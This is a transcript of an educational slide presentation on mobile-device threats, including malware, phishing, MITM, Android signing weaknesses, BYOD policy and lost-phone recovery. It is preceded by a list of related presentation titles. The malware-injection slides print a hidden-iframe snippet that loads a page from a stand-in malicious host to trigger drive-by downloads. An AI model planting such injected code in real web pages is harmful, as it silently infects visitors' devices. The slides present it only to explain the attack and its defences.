Mobile Threats and Attacks

Slides:



Advertisements
Similar presentations
Providing protection from potential security threats that exist for any internet-connected computer is termed e- security. It is important to be able to.
Advertisements

How to protect yourself, your computer, and others on the internet
Thank you to IT Training at Indiana University Computer Malware.
ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.
Online Safety. Introduction The Internet is a very public place Need to be cautious Minimize your personal risk while online Exposure to: viruses, worms,
Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
1 MIS 2000 Class 22 System Security Update: Winter 2015.
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
Cyber X-Force-SMS alert system for threats.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Threats To A Computer Network
Information Security 1 Information Security: Demo of Some Security Tools Jeffy Mwakalinga.
Cyber Security - Threats James Clement Network Specialist ETS: Communications & Network Services
Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.
Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.
Norman SecureSurf Protect your users when surfing the Internet.
Lecture 11 Electronic Business (MGT-485). Recap – Lecture 10 Transaction costs Network Externalities Switching costs Critical mass of customers Pricing.
Internet safety By Lydia Snowden.
Internet safety Viruses A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your.
eScan Total Security Suite with Cloud Security
Internet Safety CSA September 21, Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.
Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.
Outline  Infections  1) r57 shell  2) rogue software  What Can We Do?  1) Seccheck  2) Virus total  3) Sandbox  Prevention  1) Personal Software.
Data Security.
CS101 Lecture 14 Security. Network = Security Risks The majority of the bad things that can be done deliberately to you or your computer happen when you.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Cyber Crimes.
PART THREE E-commerce in Action Norton University E-commerce in Action.
Detrick Robinson & Amris Treadwell.  Computer viruses- are pieces of programs that are purposely made up to infect your computer.  Examples: › Internet.
Windows Vista Security Center Chapter 5(WV): Protecting Your Computer 9/17/20151Instructor: Shilpa Phanse.
Threat to I.T Security By Otis Powers. Hacking Hacking is a big threat to society because it could expose secrets of the I.T industry that perhaps should.
IT security By Tilly Gerlack.
GOLD UNIT 4 - IT SECURITY FOR USERS (2 CREDITS) Thomas Jenkins.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Trojan Horses on the Web. Definition: A Trojan horse a piece of software that allows the user think that it does a certain task, while actually does an.
Types of Electronic Infection
Denial of Service (DoS) DoS attacks are aggressive attacks on an individual computer or groups of computers with the intent to deny services to intended.
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.
What is risk online operation:  massive movement of operation to the internet has attracted hackers who try to interrupt such operation daily.  To unauthorized.
Topic 5: Basic Security.
Module  Introduction Introduction  Techniques and tools used to commit computer crimes Techniques and tools used to commit computer crimes.
Computer Skills and Applications Computer Security.
Cyber Safety Mohammad Abbas Alamdar Teacher of ICT STS Ajman – Boys School.
Network Security.  With an increasing amount of people getting connected to networks, the security threats that cause massive harm are increasing also.
LESSON 5-2 Protecting Your Computer Lesson Contents Protecting Your Computer Best Practices for Securing Online and Network Transactions Measures for Securing.
W elcome to our Presentation. Presentation Topic Virus.
Virus Assignment JESS D. How viruses affect people and businesses  What is a virus? A computer virus is a code or a program that is loaded onto your.
Cybersecurity Test Review Introduction to Digital Technology.
Introduction: Introduction: As technology advances, we have cheaper and easier ways to stay connected to the world around us. We are able to order almost.
Any criminal action perpetrated primarily through the use of a computer.
1 #UPAugusta Today’s Topics What are Deadly IT Sins? Know them. Fear them. Fix them. #UPAugusta201 6.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Remember effective ways to search +walk (includes words) Intitle:iPad Intext:ipad site:pbs.org Site:gov filetype:jpg.
Android and IOS Permissions Why are they here and what do they want from me?
Computer Security Keeping you and your computer safe in the digital world.
Windows Vista Configuration MCTS : Internet Explorer 7.0.
KASPERSKY INTERNET SECURITY FOR ANDROID. YOUR MOBILE DEVICES NEED PROTECTION More online communications and transaction are happening on tablets and phones.
Chapter 40 Internet Security.
Edexcel GCSE Cyber security threats Computer Science 1CP1
3.6 Fundamentals of cyber security
HOW DO I KEEP MY COMPUTER SAFE?
Computer Security.
Faculty of Science IT Department By Raz Dara MA.
How to keep the bad guys out and your data safe
Computer Security By: Muhammed Anwar.
WJEC GCSE Computer Science
Designing IIS Security (IIS – Internet Information Service)
Test 3 review FTP & Cybersecurity
Introduction-Cyber Safety
Presentation transcript:

Mobile Threats and Attacks

Possible attack threats to mobile devices Network exploit Hackers takes advantage of vulnerability or flaw of user’s web browser on mobile device in WiFi communication to attack victims. Hackers send malicious code/data from malicious logic websites to victim’s browser after user browses the malicious page and the malicious code will take over the control to get all sensitive data on the victim’s device. Social engineering Hackers use hyped contents to attract, manipulate, or persuade people into revealing confidential information through deception such as phishing for the purpose of information gathering, fraud, or access rights.

Possible attack threats to mobile devices Malware Virus hosted on a legitimate code, replicable spread worms, Trojan horses with action in purpose Misuse available resource and service Email/SMS spam or denial of service (A group of the attacking devices send volume data to one targets on the Internet to impact the target’s services)

Possible attack threats to mobile devices Enterprise/private Data Loss Work place data on a mobile device may be uploaded to home PC while synchronizing of entertainment downloading or Enterprise/private data loss due to stolen device Data tamper Intentionally modify/corrupt device data without the permission such as device’s contact list

Best practices protecting mobile device from potential threats Protect data loss due to mobile device loss with device ID and remotely remove all the apps, contacts, and confidential data right after the mobile phone is stolen or lost Type URL instead of copying/pasting or clicking links to protect mobile phones from drive-by download attacks Protect data privacy by data Encryption, don’t cache sensitive data Disable unnecessary device features such as Wi-Fi, Bluetooth, and infrared when they aren’t in use. Enabling the firewall, disable sharing

Best practices protecting mobile device from potential threats Isolate personal apps and corporate apps Detect and Remove malware Apps Download all mobile apps from trusted sources application providers and check the permission requests during installation Install a mobile security application to protect the mobile device from attacks

Mobile device security protection Strategies Block the app’s attempt to act beyond granted permissions Access Control with ID and resource access permission requirement App signature: Each app is signed with the identity of its author and protect app from tampering Encryption: Encrypt data for data protection in case of device loss or theft Isolation: Restrict any app to access the sensitive data on a device. Each Android app runs in its own virtual machine (process) which does not allow any access to resource belong to other VM except special permission grant.

Android’s Security Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices. The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple. A hacker can create and distribute malicious app since people will not be able to track down to the source and attackers add Trojan horses and malicious code to a existing legitimate app and then re-sign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost.

Bring Your Own Device (BYOD) with Mobile Device Management (MDM) Enterprise BYOD policy: Use MDM tools to oversee and control mobile devices in secure operations Store enterprise data in sandbox Encrypte enterprise data on mobile devices Keep apps current with less vulnerabilities and flaws Routinely back up all apps and upgrade OS Authenticate and register all mobile devices with Secure Socket Layer (SSL) certificate Adopt app blacklisting within enterprise Management on the lost and stolen devices Separate personal and business accounts Controls user access

Mobile Malware Security Solutions Popular Mobile Malware(malicious software) are: Spyware – steals user information with user’s consent somehow. Trojan horse – steals confidential information such as credit card Adware - displays unwanted pop-up ads with/without theft of sensitive data There are some malware that just degrade or disrupt device operations such as rebooting device and exhausting device power without financial profit purpose. Due to small screen size of mobile device most apps don’t show the URL address on the device screen while accessing web which takes even more difficult for mobile device user monitor and determine the destination of app on web.

Common types of malware delivery mechanisms Drive-by malware(silent Malware) Drive-by malware delivers(downloads) itself onto a user’s devices without their consent and interaction by exploiting vulnerabilities of user browser via an invisible element such as HTML iframe tag element or by HTML embed element of image file. Such malware either tempts the victim to visit a infected website or send malware-infected messages (SMS). Software updates Malware invites users to update software ( turned out to be a malicious one) on social network or web sits.

Common types of malware delivery mechanisms Pop-up ads Adware lures users to click on an ad that directs user to download/install malicious code such as Trojan horse in a word or pdf file. The downloaded may also be The keylogger which monitors mouse operations or keyboard strokes to steal personal data. Man-in-the-middle(MITM) Hacker may hijack a session by eavesdropping where the hacker makes independent connections with the victims and relays messages between two parties such that both parties thought they are talking directly to each other over. The MITM hacker intercepts all conversation and inject Botnet One attacker controls a group of sites(devices) to send a large volume of traffic to a victim resulted in a denial of service (DoS) attack. Afterwards, the hacker Demands the victim a payment to stop the attack.

Malware detection and protection solution Filtering with blacklisting and whitelisting Many search engines place malicious website a blocked list “blacklist.” The search engine will warn to potential visitor who intends access such sites on the list. A enterprise or a personal can also setup their own blacklist. A whitelist filter only only access to these on the list if a whitelist is exclusive. The filter techniques are widely used for spam email filtering. View page source code Use Page Source (Firefox) or Source (IE) to view the actual source code to find out the injected malicious code

Spyware detection techniques Static analysis Static analysis is a reverse engineering analysis approach to finding malicious characteristics code segments in an app without execution. The analysis focus on these obvious security threats which have been reported before. One lab in this module is given on the static analysis approach to detect spyware. b. Dynamic analysis Dynamic analysis will execute the suspicious mobile app in an isolated sandbox, such as a virtual machine or emulator to monitor and inspect the app’s dynamic behavior. c. App Permission analysis Android security uses permission to protect and detect by permissions in an Android mobile app’s intentions. The permissions are required to be clearly specified by app’s authors. Many spyware attacks make use of  app’s vulnerability on the permission.

Malware injection Malware injection is the act of inserting malicious code into a vulnerable web server page with poor application input filtering such that their devices get infected with malware when users interact with such page via form or other GUI components. This injection can be detected by a filter deployed on web server to filter out invalid commands such as SQL injection commands. Malware injection works as:

Malware injection 1. Inject a vulnerable website with malicious code that web browsers may request HTML: <iframe src=”http://www.malwebsite/malpage.html” width=”1″ height=”1″ style=”visibility: hidden”> </iframe> JavaScript(iframe is generated dynamically): <div style-“visibility:hidden: position:absolute: 1; top: 1”> <iframe src=”http://www.malwebsite.com/malpage.html” width=”1″ height=”1″ style=”visibility: hidden”> </div>

2. Exploit and take over control the infected web browsers with this injected code, direct the exploited web browser to download malware to users' devices Once user browses the injected web page, the malicious content from Hop Point (a website controlled by the hacker) to execute inside the requested (and presumed legitimate) web page. The malware injection process instructed in “http://www.malwebsite.com/malpage.html” is loaded from here through the iframe to the browser itself which will install specific piece set of instructions for the browser to connect to a malicious site in order to download malware such as remote control utilities and backdoors as well as programs that automatically crawl the hard disk in search of information such as credit card details or bank accounts 3. Finally, the victim will Silently run this downloaded malware on user device

Safeguards Log on as a no-admin user Secure your browser Set browser security to high to reject unwanted javascripts. Use Firefox with "no-script" to only run scripts from sites on whitelist examine the application code and web server for evidence of: Injected Iframes, javascript, SQL Injection, objects such as flash, PDF

Mobile device loss/Theft Now, smart mobile device is not only for just calling or sending a message, it has become business and playing tool for us. We’ve stored amount of personal data and even more sensitive important company data in the mobile device. These data may be exposed:  Email exchanges could be seen;  m-commence data such as online purchasing or banking transaction might be viewed;  If the phone is connected via a VPN, company networks will be exposed to malware or could be hacked. Americans lost about $30 billion worth of mobile phones last year.  Phones may be lost anywhere and anytime. Nearly all who found the lost phones tried to access the information on the phone,

Mobile device loss/Theft The loss of mobile device becomes a concern. About 2/3 of mobile device users feared not being able to recover lost content.  It is one of major focus of security concerns for Android mobile device. Some security experts have pointed out that targeting smartphones could potentially be more profitable for criminals than aiming at computers

Action on Your Stolen Mobile Phone   Avoid data loss Quick restoration of all important data with a preinstalled auto-backup app (e.g., WaveSecure, MyBackup) Install a mobile tracking app to protect our mobile device (Android Lost, Where’s My Droid) Salvage Actions Report the loss/theft to your organization and/or mobile service provider immediately to deter malicious use of your device and minimize fraudulent charges. Change account credentials. If devices are used to access remote resources such as corporate networks or social networking sites, you should contact your enterprise or organization to revoke all credentials that were stored on the lost device, all issued certificates or change your password. revoke. Locking Smartphone is the first line of defense line for protection of preventing thieves from stealing broadband service such as SMS fees, reading your email, or abusing VPN connections.

locates, locks and wipes. Locates: Locate your lost device and display the location on a Google map. Register your Android device with one of the many available "find me" services to locate and recover lost devices Locks: Remotely locks down your lost device, that nobody can use your phone without your access, even somebody else exchanges the SIM card on your phone. Use lock apps such as Norton Mobile or AppProtector or PIN/ passwords to lock your android devices. You can also enroll in a remote find/lock service.  Enterprises can ensuring company devices using either Exchange ActiveSync or the Android 2.2 Device Admin to remotely enforce password policies and routinely lock these devices and reset passwords. Wipes: Remotely wipe out important data which stored on your device. Some mobile service providers offer remote default and selective wiping, which allows you or your provider to remotely delete all data on the phone.  

Android’s Security Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices. The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple. A hacker can create and distribute ma­licious app since people will not be able to track down to the source and add Trojan horses and malicious code to a existing legitimate app and then re-sign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost.

Mobile Device-Encryption Android 2.2 does not support the encryption. There is no app can do full device encryption without Android OS support . Google has designed Android 3.0 for mobile device and they have taken some steps for users and the enterprise. Android 3.0 comes loaded with full encryption support for data stored on the device. We can still use some file encryption tools to protect our selected file and data.

References A window into Mobile device security http://www.symantec.com/content/en/us/about/media/pdfs/symc_mobile_device_security_june2011.pdf http://www.continuitycentral.com/feature0919.html http://www.usatoday.com/tech/news/story/2012-03-22/lost-phones/53707448/1] US-CERT Resource: Paul Ruggiero and Jon Foote, “Cyber Threats to Mobile Phones”, http://www.us-cert.gov/reading_room/cyber_threats_to_mobile_phones.pdf) Top 10 android Security Riskshttp://www.esecurityplanet.com/views/article.php/3928646/Top-10-Android-Security-Risks.htm